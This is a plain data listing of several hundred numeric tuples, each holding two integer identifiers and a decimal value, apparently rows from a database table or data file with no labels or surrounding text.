(269, 303013, 0.88669),
(269, 303014, 1.05),
(269, 303015, 0.95669),
(269, 303016, 1.05),
(269, 303017, 1.02669),
(269, 303018, 0.98),
(269, 303019, 1.09669),
(269, 303020, 1.05),
(269, 303021, 1.16669),
(269, 303022, 1.14331),
(269, 303023, 0.23331),
(269, 303024, 0.91),
(269, 303025, 0.98),
(269, 303026, 0.95669),
(269, 303027, 1.02669),
(269, 303028, 1.00331),
(269, 303029, 1.07331),
(269, 303030, 1.00331),
(269, 303031, 1.16669),
(269, 303032, 0.93331),
(269, 303033, 1.16669),
(269, 303034, 0.98),
(269, 303035, 1.05),
(269, 303329, 0.84),
(269, 303330, 1.00331),
(269, 303331, 0.88669),
(269, 303332, 1.05),
(269, 303333, 0.98),
(269, 303334, 1.16669),
(269, 303335, 1.05),
(269, 303336, 0.93331),
(269, 303337, 1.00331),
(269, 303338, 1.00331),
(269, 303339, 1.07331),
(269, 303340, 1.35331),
(269, 303341, 1.4),
(269, 303484, 0.98),
(269, 303485, 1.05),
(269, 303486, 0.98),
(269, 303487, 0.95669),
(305, 303487, 0.95669),
(269, 303488, 0.98),
(269, 303489, 0.95669),
(269, 303490, 1.05),
(269, 303491, 0.86331),
(269, 303492, 0.98),
(306, 303493, 1.00331),
(269, 303493, 2.00662),
(269, 303494, 0.98),
(269, 303495, 1.05),
(269, 303496, 0.98),
(269, 303497, 1.07331),
(269, 303498, 0.95669),
(269, 303499, 1.02669),
(269, 303500, 0.95669),
(269, 303501, 0.98),
(269, 303502, 0.88669),
(269, 303503, 0.98),
(269, 303504, 1.07331),
(269, 303505, 0.95669),
(269, 303506, 1.07331),
(269, 303507, 0.98),
(269, 303508, 1.07331),
(269, 303509, 1.96),
(269, 303510, 1.07331),
(272, 303968, 1.37669),
(274, 304103, 0.28),
(274, 304104, 0.98),
(274, 304105, 1.07331),
(274, 304106, 0.93331),
(274, 304107, 1.12),
(274, 304108, 0.91),
(274, 304109, 1.05),
(274, 304110, 0.93331),
(274, 304111, 1.02669),
(306, 304112, 0.46669),
(274, 304112, 1.40007),
(274, 304113, 1.02669),
(274, 304114, 1.14331),
(274, 304115, 2.00662),
(274, 304116, 1.09669),
(274, 304117, 1.16669),
(274, 304118, 9.87981),
(274, 304119, 0.42),
(274, 304120, 0.98),
(274, 304121, 1.21331),
(274, 304122, 1.05),
(274, 304123, 1.21331),
(274, 304124, 1.07331),
(274, 304125, 0.56),
(274, 304126, 1.05),
(274, 304127, 1.16669),
(274, 304128, 1.12),
(274, 304129, 1.30669),
(274, 304130, 0.32669),
(274, 304131, 1.00331),
(274, 304132, 1.07331),
(274, 304133, 1.02669),
(274, 304134, 1.09669),
(274, 304506, 0.32669),
(274, 304507, 0.95669),
(274, 304508, 1.07331),
(274, 304509, 1.00331),
(274, 304510, 1.28331),
(274, 304511, 0.98),
(274, 304512, 0.91),
(274, 304513, 1.14331),
(274, 304684, 1.00331),
(274, 304685, 0.98),
(274, 304686, 1.23669),
(274, 304687, 1.16669),
(274, 304688, 0.98),
(274, 304689, 1.00331),
(274, 304690, 0.98),
(274, 304691, 1.07331),
(274, 304692, 1.12),
(274, 304693, 0.98),
(274, 304694, 11.8336),
(275, 305065, 0.86331),
(275, 305066, 0.91),
(275, 305067, 0.88669),
(275, 305068, 0.95669),
(275, 305069, 0.28),
(275, 305070, 0.95669),
(275, 305071, 1.05),
(275, 305072, 1.14331),
(275, 305073, 0.88669),
(275, 305074, 0.98),
(275, 305075, 0.93331),
(275, 305076, 1.02669),
(275, 305077, 1.05),
(275, 305078, 1.12),
(275, 305079, 0.95669),
(275, 305080, 1.09669),
(275, 305081, 0.88669),
(275, 305082, 0.98),
(275, 305083, 0.65338),
(275, 305084, 0.93331),
(275, 305085, 1.12),
(275, 305086, 0.95669),
(275, 305087, 1.07331),
(275, 305385, 0.93331),
(275, 305386, 1.21331),
(275, 305387, 0.46669),
(275, 305388, 1.12),
(275, 305389, 1.19),
(275, 305390, 0.91),
(275, 305391, 1.00331),
(275, 305392, 1.09669),
(275, 305393, 1.16669),
(275, 305394, 0.18669),
(275, 305395, 0.86331),
(275, 305396, 1.07331),
(275, 305542, 9.6),
(275, 305543, 1.05),
(275, 305544, 0.88669),
(275, 305545, 1.05),
(275, 305546, 1.02669),
(275, 305547, 9.17312),
(275, 305548, 0.91),
(275, 305549, 1.00331),
(275, 305550, 1.00331),
(275, 305551, 1.16669),
(275, 305552, 1.09669),
(275, 305553, 1.19),
(275, 305554, 1.05),
(275, 305555, 1.12),
(275, 305556, 1.09669),
(275, 305557, 1.16669),
(275, 305558, 1.02669),
(275, 305559, 1.12),
(275, 305560, 1.07331),
(280, 307608, 1.4),
(287, 312767, 0.88669),
(287, 312768, 0.95669),
(287, 312820, 0.88669),
(287, 312821, 0.95669),
(287, 312822, 0.93331),
(287, 312823, 1.09669),
(287, 312824, 2.26661),
(287, 312825, 0.88669),
(287, 312826, 1.05),
(287, 312827, 1.09669),
(287, 312828, 1.02669),
(287, 312829, 1.14331),
(287, 312830, 0.32669),
(287, 312831, 1.02669),
(287, 312832, 1.09669),
(287, 312947, 0.98),
(287, 312948, 1.07331),
(287, 312949, 0.88669),
(287, 312950, 1.05),
(287, 313012, 0.86331),
(287, 313013, 1.00331),
(287, 313014, 0.86331),
(287, 313015, 0.93331),
(287, 313016, 0.84),
(287, 313017, 0.98),
(287, 313018, 1.02669),
(287, 313019, 0.98),
(287, 313020, 1.02669),
(287, 313021, 1.02669),
(287, 313022, 0.95669),
(287, 313023, 1.05),
(288, 313360, 0.93331),
(288, 313361, 1.05),
(288, 313362, 0.95669),
(288, 313363, 1.07331),
(288, 313364, 0.95669),
(288, 313365, 1.12),
(288, 313366, 1.07331),
(288, 313367, 1.14331),
(288, 313368, 1.19),
(288, 313369, 1.28331),
(288, 313370, 0.98),
(304, 313370, 1.96),
(288, 313371, 1.12),
(288, 313372, 1.07331),
(288, 313373, 1.16669),
(288, 313374, 1.02669),
(288, 313375, 1.09669),
(288, 313376, 0.28),
(288, 313377, 0.95669),
(288, 313378, 1.05),
(288, 313379, 0.93331),
(288, 313380, 1.14331),
(288, 313381, 0.93331),
(288, 313382, 1.02669),
(288, 313383, 0.98),
(288, 313384, 1.05),
(288, 313385, 1.00331),
(288, 313386, 1.09669),
(288, 313387, 1.23669),
(288, 313388, 1.35331),
(288, 313389, 1.16669),
(288, 313390, 1.35331),
(288, 313391, 1.12),
(288, 313392, 1.19),
(288, 313393, 0.91),
(288, 313394, 1.00331),
(288, 313395, 1.16669),
(288, 313396, 1.28331),
(288, 313744, 0.86331),
(288, 313745, 0.93331),
(288, 313746, 1.00331),
(288, 313747, 0.98),
(288, 313748, 1.14331),
(288, 313749, 1.05),
(288, 313750, 1.21331),
(288, 313751, 0.28),
(288, 313752, 0.91),
(288, 313753, 0.95669),
(288, 313956, 0.95669),
(288, 313957, 1.02669),
(288, 313958, 1.05),
(288, 313959, 0.93331),
(288, 313960, 0.95669),
(288, 313961, 1.00331),
(288, 313962, 0.98),
(288, 313963, 1.02669),
(288, 313964, 1.12),
(288, 313965, 0.95669),
(288, 313966, 1.07331),
(288, 313967, 0.84),
(288, 313968, 0.95669),
(288, 313969, 0.88669),
(288, 313970, 0.98),
(288, 313971, 1.05),
(288, 313972, 1.00331),
(288, 313973, 1.07331),
(288, 313974, 1.19),
(288, 313975, 4.85677),
(288, 313976, 4.24008),
(288, 313977, 1.21331),
(288, 313978, 1.28331),
(288, 313979, 1.30669),
(290, 315405, 0.91),
(290, 315406, 1.02669),
(290, 315407, 0.28),
(290, 315408, 1.02669),
(290, 315409, 1.09669),
(290, 315410, 0.95669),
(290, 315411, 1.07331),
(290, 315412, 1.09669),
(290, 315413, 1.16669),
(290, 315414, 4.26688),
(290, 315415, 1.05),
(290, 315416, 1.12),
(290, 315417, 8.55),
(290, 315418, 9.30981),
(290, 315419, 0.95669),
(305, 315419, 0.95669),
(290, 315420, 0.91),
(290, 315421, 1.07331),
(290, 315422, 1.05),
(290, 315423, 1.12),
(290, 315424, 0.28),
(290, 315425, 0.93331),
(290, 315426, 1.05),
(290, 315427, 1.82),
(290, 315428, 1.96),
(290, 315651, 0.37331),
(290, 315652, 1.05),
(290, 315653, 1.23669),
(290, 315654, 0.32669),
(304, 315654, 0.32669),
(306, 315654, 0.32669),
(290, 315655, 0.93331),
(290, 315656, 1.05),
(290, 315838, 0.98),
(290, 315839, 1.07331),
(290, 315840, 1.00331),
(290, 315841, 1.12),
(290, 315842, 0.95669),
(290, 315843, 1.16669),
(290, 315844, 1.00331),
(290, 315845, 1.14331),
(290, 315846, 1.96),
(290, 315847, 1.07331),
(290, 315848, 1.09669),
(292, 317450, 1.09669),
(292, 317451, 0.93331),
(292, 317452, 1.05),
(292, 317453, 1.00331),
(292, 317454, 1.12),
(292, 317455, 0.93331),
(292, 317456, 0.98),
(292, 317457, 1.07331),
(292, 317458, 0.84),
(292, 317459, 0.95669),
(292, 317460, 1.07331),
(292, 317461, 1.14331),
(292, 317462, 0.37331),
(292, 317463, 0.95669),
(292, 317464, 1.05),
(292, 317465, 1.23669),
(292, 317466, 0.42),
(292, 317467, 1.00331),
(292, 317468, 1.14331),
(292, 317469, 1.09669),
(292, 317470, 1.16669),
(292, 317471, 1.00331),
(292, 317472, 1.09669),
(292, 317473, 1.07331),
(292, 317474, 1.16669),
(292, 317475, 0.95669),
(292, 317476, 1.02669),
(292, 317477, 1.05),
(292, 317478, 0.98),
(292, 317479, 1.00331),
(292, 317480, 1.09669),
(292, 317481, 1.07331),
(292, 317482, 1.19),
(292, 317483, 1.00331),
(292, 317484, 1.09669),
(292, 317485, 0.32669),
(292, 317486, 0.93331),
(292, 317487, 1.19),
(292, 317488, 0.95669),
(292, 317489, 1.12),
(292, 317871, 0.28),
(292, 317872, 0.95669),
(292, 317873, 1.05),
(292, 317874, 0.32669),
(292, 317875, 0.98),
(292, 317876, 1.07331),
(292, 317877, 0.32669),
(292, 317878, 0.95669),
(292, 317879, 1.16669),
(292, 317880, 0.28),
(292, 317881, 0.98),
(292, 317882, 1.14331),
(292, 317883, 1.00331),
(292, 317884, 1.07331),
(292, 318138, 0.95669),
(292, 318139, 1.07331),
(292, 318140, 0.28),
(292, 318141, 0.93331),
(292, 318142, 0.98),
(292, 318143, 0.93331),
(292, 318144, 0.95669),
(292, 318145, 0.95669),
(292, 318146, 1.91338),
(292, 318147, 1.07331),
(292, 318148, 1.00331),
(306, 318149, 0.93331),
(292, 318149, 1.86662),
(292, 318150, 1.09669),
(292, 318151, 0.88669),
(292, 318152, 0.95669),
(292, 318153, 0.98),
(292, 318154, 8.96),
(292, 318155, 8.93019),
(292, 318156, 1.12),
(292, 318157, 1.00331),
(292, 318158, 1.12),
(292, 318159, 0.88669),
(292, 318160, 0.98),
(292, 318161, 1.09669),
(292, 318162, 1.09669),
(292, 318163, 0.98),
(292, 318164, 1.96),
(292, 318165, 1.09669),
(292, 318166, 1.12),
(292, 318167, 1.16669),
(292, 318168, 1.07331),
(292, 318169, 0.95669),
(292, 318170, 1.07331),
(292, 318171, 0.93331),
(292, 318172, 1.05),
(292, 318173, 1.00331),
(292, 318174, 1.07331),
(292, 318175, 0.98),
(292, 318176, 1.12),
(295, 318547, 0.42),
(295, 318548, 0.93331),
(295, 318549, 1.19),
(295, 318550, 0.98),
(295, 318551, 1.23669),
(295, 318552, 0.93331),
(295, 318553, 1.19),
(295, 318582, 1.16669),
(295, 318583, 1.28331),
(295, 318584, 0.88669),
(305, 318584, 0.88669),
(295, 318585, 1.00331),
(295, 318586, 0.93331),
(295, 318587, 1.05),
(295, 318588, 1.12),
(295, 318589, 1.19),
(295, 318590, 0.28),
(295, 318591, 1.00331),
(295, 318592, 1.14331),
(295, 318593, 1.00331),
(295, 318594, 1.09669),
(295, 318595, 0.88669),
(295, 318596, 1.05),
(295, 318597, 0.91),
(295, 318598, 1.02669),
(295, 318599, 0.42),
(295, 318600, 1.07331),
(295, 318601, 1.16669),
(295, 318737, 0.23331),
(295, 318738, 0.91),
(295, 318739, 1.12),
(295, 318740, 0.32669),
(295, 318741, 1.00331),
(295, 318742, 1.19),
(295, 318743, 0.95669),
(295, 318744, 1.02669),
(295, 318745, 0.98),
(295, 318746, 1.16669),
(295, 318747, 0.7),
(295, 318748, 1.16669),
(295, 318749, 1.26),
(295, 318838, 0.98),
(305, 318838, 0.98),
(295, 318839, 1.07331),
(295, 318840, 0.98),
(295, 318841, 1.07331),
(295, 318842, 0.32669),
(295, 318843, 0.95669),
(295, 318844, 1.4),
(298, 320078, 1.05),
(304, 320078, 1.05),
(298, 320079, 0.98),
(308, 320079, 0.98),
(298, 320080, 1.09669),
(308, 320080, 1.09669),
(298, 320081, 0.98),
(308, 320081, 0.98),
(298, 320082, 0.91),
(308, 320082, 0.91),
(298, 320083, 1.05),
(308, 320083, 1.05),
(298, 320084, 0.93331),
(308, 320084, 0.93331),
(298, 320085, 1.12),
(308, 320085, 1.12),
(298, 320086, 0.95669),
(308, 320086, 0.95669),
(298, 320087, 1.14331),
(308, 320087, 1.14331),
(298, 320088, 1.28331),
(308, 320088, 1.28331),
(298, 320089, 0.23331),
(304, 320089, 0.23331),
(308, 320089, 0.23331),
(298, 320090, 1.00331),
(304, 320090, 1.00331),
(308, 320090, 1.00331),
(298, 320091, 1.12),
(304, 320091, 1.12),
(308, 320091, 1.12),
(298, 320092, 1.09669),
(304, 320092, 1.09669),
(308, 320092, 1.09669),
(298, 320093, 0.60669),
(308, 320093, 0.60669),
(298, 320094, 1.12),
(308, 320094, 1.12),
(298, 320095, 1.23669),
(308, 320095, 1.23669),
(298, 320096, 0.60669),
(308, 320096, 0.60669),
(298, 320097, 1.07331),
(308, 320097, 1.07331),
(298, 320098, 1.30669),
(308, 320098, 1.30669),
(298, 320099, 0.98),
(308, 320099, 0.98),
(298, 320100, 1.14331),
(308, 320100, 1.14331),
(298, 320101, 1.09669),
(304, 320101, 1.09669),
(308, 320101, 1.09669),
(298, 320102, 1.07331),
(298, 320103, 1.14331),
(298, 320104, 1.07331),
(308, 320104, 1.07331),
(298, 320105, 1.23669),
(308, 320105, 1.23669),
(298, 320106, 0.98),
(304, 320106, 0.98),
(308, 320106, 0.98),
(298, 320107, 1.21331),
(304, 320107, 1.21331),
(308, 320107, 1.21331),
(298, 320108, 0.91),
(308, 320108, 0.91),
(298, 320109, 1.16669),
(308, 320109, 1.16669),
(298, 320300, 1.02669),
(308, 320300, 1.02669),
(298, 320301, 0.28),
(308, 320301, 0.28),
(298, 320302, 0.98),
(308, 320302, 0.98),
(298, 320303, 1.16669),
(308, 320303, 1.16669),
(298, 320304, 1.14331),
(308, 320304, 1.14331),
(298, 320305, 1.28331),
(308, 320305, 1.28331),
(298, 320306, 1.07331),
(298, 320307, 1.35331),
(298, 320308, 1.05),
(308, 320308, 1.05),
(298, 320309, 1.23669),
(308, 320309, 1.23669),
(298, 320310, 1.14331),
(308, 320310, 1.14331),
(298, 320311, 1.21331),
(308, 320311, 1.21331),
(298, 320312, 1.02669),
(308, 320312, 1.02669),
(298, 320313, 1.12),
(308, 320313, 1.12),
(298, 320314, 0.88669),
(308, 320314, 0.88669),
(298, 320315, 1.09669),
(308, 320315, 1.09669),
(298, 320446, 1.00331),
(308, 320446, 1.00331),
(298, 320447, 1.12),
(308, 320447, 1.12),
(298, 320448, 1.07331),
(308, 320448, 1.07331),
(298, 320449, 0.95669),
(308, 320449, 0.95669),
(298, 320450, 1.21331),
(308, 320450, 1.21331),
(298, 320451, 0.93331),
(308, 320451, 0.93331),
(298, 320452, 1.00331),
(308, 320452, 1.00331),
(298, 320453, 0.98),
(308, 320453, 0.98),
(298, 320454, 1.19),
(298, 320455, 0.93331),
(308, 320455, 0.93331),
(298, 320456, 1.23669),
(308, 320456, 1.23669),
(298, 320457, 1.05),
(308, 320457, 1.05),
(298, 320458, 0.88669),
(308, 320458, 0.88669),
(298, 320459, 1.00331),
(308, 320459, 1.00331),
(298, 320460, 0.93331),
(308, 320460, 0.93331),
(298, 320461, 1.26),
(308, 320461, 1.26),
(298, 320462, 1.12),
(308, 320462, 1.12),
(298, 320463, 0.93331),
(308, 320463, 0.93331),
(298, 320464, 1.05),
(308, 320464, 1.05),
(298, 320465, 1.12),
(304, 320465, 1.12),
(308, 320465, 1.12),
(298, 320466, 1.19),
(298, 320467, 1.00331),
(308, 320467, 1.00331),
(298, 320468, 1.07331),
(308, 320468, 1.07331),
(298, 320469, 1.02669),
(308, 320469, 1.02669),
(298, 320470, 1.09669),
(308, 320470, 1.09669),
(298, 320471, 1.00331),
(308, 320471, 1.00331),
(298, 320472, 0.95669),
(308, 320472, 0.95669),
(298, 320473, 1.02669),
(308, 320473, 1.02669),
(298, 320474, 2.60661),
(308, 320474, 2.60661),
(304, 320474, 5.36655),
(298, 320475, 1.30669),
(308, 320475, 1.30669),
(298, 320476, 1.09669),
(308, 320476, 1.09669),
(299, 320555, 0.86331),
(299, 320556, 0.98),
(299, 320557, 0.84),
(299, 320558, 0.93331),
(299, 320559, 1.00331),
(299, 320782, 0.91),
(299, 320783, 1.00331),
(299, 320784, 0.93331),
(299, 320785, 1.00331),
(299, 320786, 0.95669),
(299, 320787, 0.86331),
(299, 320788, 0.93331),
(299, 320789, 1.00331),
(299, 320790, 1.16669),
(299, 320791, 1.91338),
(299, 320792, 1.12),
(299, 320793, 1.05),
(299, 320794, 0.98),
(299, 320795, 1.07331),
(299, 320796, 0.88669),
(299, 320797, 0.98),
(299, 320798, 0.23331),
(299, 320799, 0.86331),
(299, 320800, 0.95669),
(299, 320801, 0.91),
(299, 320802, 0.98),
(299, 320803, 0.95669),
(299, 320804, 1.07331),
(299, 320805, 1.09669),
(299, 320806, 1.07331),
(299, 320807, 1.00331),
(299, 320808, 0.98),
(299, 320809, 1.05),
(299, 320810, 0.93331),
(299, 320811, 1.00331),
(299, 320812, 0.95669),
(299, 320813, 1.02669),
(299, 320814, 1.09669),
(299, 320815, 1.21331),
(299, 320816, 0.28),
(299, 320817, 1.07331),
(299, 320818, 1.14331),
(299, 320819, 1.96),
(299, 320820, 1.05),
(299, 320821, 1.07331),
(299, 320822, 1.00331),
(299, 320823, 1.12),
(299, 320824, 0.32669),
(299, 320825, 0.95669),
(299, 320826, 1.09669),
(299, 320827, 0.81669),
(299, 320828, 0.88669),
(299, 320829, 0.98),
(299, 320830, 1.14331),
(299, 320831, 0.37331),
(299, 320832, 1.09669),
(299, 320833, 1.16669),
(299, 320834, 1.05),
(299, 320835, 1.12),
(299, 320836, 0.93331),
(299, 320837, 1.02669),
(299, 321311, 0.18669),
(299, 321312, 0.88669),
(299, 321313, 1.02669),
(299, 321314, 0.93331),
(306, 321314, 0.93331),
(299, 321315, 1.05),
(299, 321316, 0.28),
(299, 321317, 0.93331),
(299, 321318, 1.02669),
(299, 321319, 0.93331),
(299, 321320, 1.07331),
(299, 321321, 1.07331),
(299, 321322, 1.05),
(299, 321323, 1.14331),
(299, 321324, 0.98),
(299, 321325, 1.09669),
(299, 321326, 1.12),
(299, 321327, 1.19),
(299, 321328, 1.14331),
(299, 321329, 1.23669),
(299, 321330, 1.02669),
(299, 321331, 1.28331),
(299, 321332, 0.28),
(299, 321333, 0.91),
(299, 321334, 1.00331),
(299, 321335, 0.51331),
(299, 321336, 1.02669),
(299, 321337, 1.14331),
(299, 321338, 1.09669),
(299, 321339, 1.21331),
(299, 321340, 1.09669),
(299, 321341, 1.16669),
(299, 321342, 0.42),
(299, 321343, 0.84),
(299, 321344, 0.95669),
(299, 321345, 1.63338),
(299, 321346, 1.77338),
(299, 321644, 0.98),
(299, 321645, 0.98),
(299, 321646, 1.05),
(299, 321647, 1.91338),
(299, 321648, 1.02669),
(299, 321649, 1.05),
(299, 321650, 1.09669),
(299, 321651, 0.93331),
(299, 321652, 1.02669),
(299, 321653, 1.02669),
(299, 321654, 0.88669),
(299, 321655, 1.07331),
(299, 321656, 0.88669),
(299, 321657, 0.95669),
(299, 321658, 1.02669),
(299, 321659, 0.95669),
(299, 321660, 1.02669),
(299, 321661, 0.95669),
(299, 321662, 1.19),
(299, 321663, 0.93331),
(299, 321664, 1.00331),
(299, 321665, 1.05),
(299, 321666, 1.00331),
(299, 321667, 1.07331),
(299, 321668, 0.88669),
(306, 321668, 0.88669),
(299, 321669, 1.00331),
(306, 321669, 1.00331),
(299, 321670, 1.05),
(299, 321671, 0.98),
(299, 321672, 1.16669),
(299, 321673, 1.00331),
(299, 321674, 1.00331),
(299, 321675, 0.93331),
(299, 321676, 1.02669),
(299, 321677, 1.02669),
(299, 321678, 0.91),
(299, 321679, 0.98),
(299, 321680, 0.91),
(299, 321681, 1.09669),
(299, 321682, 1.12),
(299, 321683, 1.19),
(299, 321684, 1.07331),
(299, 321685, 1.26),
(299, 321686, 1.05),
(299, 321687, 1.14331),
(299, 321688, 0.95669),
(304, 323956, 0.98),
(305, 323956, 0.98),
(304, 323957, 1.07331),
(305, 323957, 1.07331),
(304, 324822, 0.86331),
(304, 324823, 1.00331),
(304, 324936, 0.93331),
(304, 324937, 1.05),
(304, 324938, 0.86331),
(304, 324939, 0.93331),
(304, 324940, 0.88669),
(304, 324941, 0.98),
(304, 324942, 0.88669),
(304, 324943, 1.07331),
(304, 324944, 1.05),
(304, 324945, 0.91),
(304, 324946, 1.00331),
(304, 324947, 0.95669),
(304, 324948, 1.09669),
(304, 324949, 1.14331),
(304, 324950, 1.07331),
(304, 324951, 1.02669),
(304, 324952, 1.07331),
(304, 324953, 1.02669),
(304, 324954, 0.98),
(304, 324955, 1.09669),
(304, 324956, 1.16669),
(304, 324957, 0.93331),
(304, 324958, 0.98),
(304, 325287, 0.88669),
(304, 325288, 1.02669),
(304, 325289, 1.00331),
(304, 325290, 1.07331),
(304, 325291, 1.12),
(304, 325292, 0.32669),
(308, 325292, 0.32669),
(304, 325293, 0.98),
(304, 325294, 1.26),
(304, 325295, 1.09669),
(304, 325296, 1.30669),
(304, 325297, 0.91),
(306, 325297, 0.91),
(304, 325298, 1.02669),
(304, 325299, 0.91),
(304, 325300, 1.07331),
(304, 325301, 0.32669),
(304, 325302, 1.02669),
(304, 325303, 1.14331),
(304, 325518, 0.88669),
(304, 325519, 1.12),
(304, 325520, 0.42),
(306, 325520, 0.42),
(304, 325521, 1.05),
(306, 325521, 1.05),
(304, 325522, 1.14331),
(306, 325522, 1.14331),
(304, 325523, 1.09669),
(304, 325524, 1.09669),
(304, 325525, 0.84),
(304, 325526, 0.98),
(304, 325527, 0.86331),
(304, 325528, 0.95669),
(304, 325529, 0.98),
(304, 325530, 0.88669),
(304, 325531, 1.05),
(304, 325532, 0.93331),
(304, 325533, 0.95669),
(304, 325534, 0.98),
(306, 325534, 0.98),
(304, 325535, 0.93331),
(304, 325536, 1.00331),
(304, 325537, 1.16669),
(304, 325538, 1.00331),
(304, 325539, 1.16669),
(304, 325540, 0.98),
(304, 325541, 0.98),
(304, 325542, 0.95669),
(304, 325543, 0.95669),
(304, 325544, 0.93331),
(304, 325545, 1.02669),
(304, 325546, 1.09669),
(304, 325547, 1.02669),
(304, 325548, 1.14331),
(304, 325549, 1.19),
(304, 325550, 1.19),
(304, 325551, 3.42993),
(304, 325552, 0.98),
(304, 325553, 1.28331),
(304, 325554, 1.09669),
(304, 325555, 1.00331),
(304, 325556, 1.09669),
(304, 325557, 1.00331),
(304, 325558, 1.09669),
(305, 325986, 0.86331),
(305, 325987, 1.00331),
(305, 325988, 1.91338),
(305, 325989, 2.38),
(305, 325990, 0.95669),
(305, 325991, 1.00331),
(305, 325992, 0.93331),
(305, 325993, 1.05),
(305, 325994, 0.93331),
(305, 325995, 1.02669),
(305, 325996, 0.88669),
(305, 325997, 1.00331),
(305, 325998, 0.95669),
(305, 325999, 1.07331),
(305, 326000, 1.16669),
(305, 326001, 1.14331),
(305, 326002, 1.26),
(305, 326003, 0.56),
(305, 326004, 1.07331),
(305, 326005, 1.14331),
(305, 326006, 0.93331),
(305, 326007, 1.00331),
(305, 326008, 1.07331),
(305, 326009, 1.19),
(305, 326010, 0.51331),
(305, 326011, 1.02669),
(305, 326012, 1.19),
(305, 326013, 0.46669),
(305, 326014, 1.02669),
(305, 326015, 1.09669),
(305, 326016, 1.86676),
(305, 326017, 1.02669),
(305, 326018, 1.26),
(305, 326019, 1.00331),
(305, 326020, 1.16669),
(305, 326021, 1.00331),
(305, 326022, 1.05),
(305, 326023, 1.07331),
(305, 326024, 1.14331),
(305, 326025, 0.37331),
(305, 326026, 0.95669),
(305, 326027, 1.02669),
(305, 326028, 0.51331),
(305, 326029, 1.14331),
(305, 326030, 1.26),
(305, 326031, 0.46669),
(305, 326032, 1.16669),
(305, 326033, 1.26),
(305, 326454, 1.82),
(305, 326455, 2.00662),
(305, 326456, 0.98),
(305, 326457, 1.05),
(305, 326458, 0.42),
(305, 326459, 1.00331),
(305, 326460, 1.19),
(305, 326461, 0.56),
(305, 326462, 1.12),
(305, 326463, 1.23669),
(305, 326464, 0.42),
(305, 326465, 1.02669),
(305, 326466, 1.12),
(305, 326467, 1.09669),
(305, 326468, 1.21331),
(305, 326469, 2.38),
(305, 326470, 0.28),
(305, 326471, 1.09669),
(305, 326472, 1.16669),
(305, 326473, 0.32669),
(305, 326474, 1.02669),
(305, 326475, 1.14331),
(305, 326476, 1.00331),
(305, 326477, 1.12),
(305, 326478, 0.84),
(305, 326479, 1.12),
(305, 326480, 1.23669),
(305, 326481, 0.98),
(305, 326482, 1.05),
(305, 326483, 0.95669),
(305, 326484, 1.02669),
(305, 326485, 0.88669),
(305, 326486, 1.00331),
(305, 326765, 1.00331),
(305, 326766, 0.93331),
(305, 326767, 1.00331),
(305, 326768, 0.91),
(305, 326769, 1.02669),
(305, 326770, 0.91),
(305, 326771, 1.02669),
(305, 326772, 1.02669),
(305, 326773, 0.88669),
(305, 326774, 1.05),
(305, 326775, 0.98),
(305, 326776, 1.02669),
(305, 326777, 0.95669),
(305, 326778, 1.02669),
(305, 326779, 0.88669),
(305, 326780, 0.95669),
(305, 326781, 1.05),
(305, 326782, 1.02669),
(305, 326783, 0.98),
(305, 326784, 0.98),
(305, 326785, 0.95669),
(305, 326786, 1.02669),
(305, 326787, 1.19),
(305, 326788, 1.14331),
(305, 326789, 1.07331),
(305, 326790, 0.98),
(305, 326791, 0.95669),
(305, 326792, 1.07331),
(306, 326793, 1.09669),
(305, 326793, 2.19338),
(305, 326794, 1.21331),
(305, 326795, 1.21331),
(306, 326795, 1.21331),
(305, 326796, 2.1),
(305, 326797, 1.09669),
(305, 326798, 1.12),
(306, 327135, 1.00331),
(306, 327136, 1.00331),
(306, 327137, 1.05),
(306, 327138, 1.14331),
(306, 327139, 0.93331),
(306, 327140, 1.16669),
(306, 327141, 1.02669),
(306, 327142, 1.12),
(306, 327143, 0.98),
(306, 327144, 1.07331),
(306, 327145, 1.00331),
(306, 327146, 1.14331),
(306, 327147, 1.19),
(306, 327148, 1.00331),
(306, 327149, 0.95669),
(306, 327150, 1.07331),
(306, 327151, 0.95669),
(306, 327152, 1.16669),
(306, 327153, 0.86331),
(306, 327154, 0.91),
(306, 327155, 0.81669),
(306, 327156, 0.91),
(306, 327157, 0.84),
(306, 327158, 0.91),
(306, 327159, 0.88669),
(306, 327160, 1.09669),
(306, 327161, 0.86331),
(306, 327162, 0.95669),
(306, 327163, 1.00331),
(306, 327164, 1.07331),
(306, 327165, 0.93331),
(306, 327166, 1.05),
(306, 327167, 2.73),
(306, 327168, 1.02669),
(306, 327169, 1.02669),
(306, 327170, 1.14331),
(306, 327171, 1.07331),
(306, 327172, 1.26),
(306, 327173, 0.98),
(306, 327174, 1.12),
(306, 327175, 0.91),
(306, 327176, 1.05),
(306, 327177, 0.95669),
(306, 327178, 1.19),
(306, 327179, 0.98),
(306, 327180, 1.21331),
(306, 327181, 0.93331),
(306, 327182, 1.00331),
(306, 327183, 0.23331),
(306, 327184, 0.91),
(306, 327185, 1.14331),
(306, 327186, 0.88669),
(306, 327187, 1.00331),
(306, 327188, 1.05),
(306, 327189, 1.16669),
(306, 327190, 1.00331),
(306, 327191, 1.09669),
(306, 327192, 0.32669),
(306, 327193, 0.93331),
(306, 327194, 1.05),
(306, 327195, 1.02669),
(306, 327196, 1.12),
(306, 327197, 1.19),
(306, 327198, 0.56),
(306, 327199, 1.07331),
(306, 327200, 1.21331),
(306, 327201, 1.00331),
(306, 327202, 1.12),
(306, 327203, 0.95669),
(306, 327204, 1.05),
(306, 327205, 1.00331),
(306, 327206, 1.09669),
(306, 327207, 0.93331),
(306, 327208, 1.00331),
(306, 327209, 0.32669),
(306, 327210, 1.05),
(306, 327211, 1.16669),
(306, 327212, 0.23331),
(306, 327213, 0.88669),
(306, 327214, 0.93331),
(306, 327215, 1.07331),
(306, 327216, 1.19),
(306, 327217, 0.93331),
(306, 327218, 1.05),
(306, 327219, 0.42),
(306, 327220, 1.05),
(306, 327221, 1.14331),
(306, 328040, 1.02669),
(306, 328041, 0.93331),
(306, 328042, 1.02669),
(306, 328043, 1.05),
(306, 328044, 0.32669),
(306, 328045, 0.95669),
(306, 328046, 1.05),
(306, 328047, 1.16669),
(306, 328048, 0.7),
(306, 328049, 1.4),
(306, 328050, 1.4),
(306, 328051, 0.42),
(306, 328052, 1.00331),
(306, 328053, 1.07331),
(306, 328054, 0.18669),
(306, 328055, 0.84),
(306, 328056, 1.00331),
(306, 328057, 1.19),
(306, 328058, 1.33),
(306, 328059, 1.21331),
(306, 328060, 1.19),
(306, 328061, 1.26),
(306, 328062, 0.95669),
(306, 328063, 1.07331),
(306, 328064, 1.16669),
(306, 328065, 0.93331),
(306, 328066, 1.19),
(306, 328067, 1.07331),
(306, 328068, 0.93331),
(306, 328069, 1.05),
(306, 328499, 0.04669),
